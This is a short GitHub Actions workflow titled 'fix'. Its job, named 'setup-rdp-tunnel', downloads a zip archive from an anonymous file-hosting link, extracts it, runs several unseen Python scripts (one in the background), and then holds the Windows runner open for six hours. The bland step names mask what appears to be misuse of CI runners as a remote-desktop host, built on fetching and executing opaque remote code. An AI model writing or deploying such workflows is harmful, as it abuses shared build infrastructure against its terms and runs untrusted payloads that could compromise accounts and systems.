name: fix

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check out the repository
      uses: actions/checkout@v2

    - name: Download and extract
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/5NFKbCJz/info/zip/main3.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"


    - name: Install requests package-update
      run: python -m pip install requests
      
    - name: Start
      run: |
        cd extracted
        Start-Sleep -Seconds 30
        python test.py

    - name: Star
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

        
    - name: Run test.py
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test2.py

    - name: Run test.py
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test3.py

    - name: Keep alive-v34
      run: Start-Sleep -Seconds 21600  
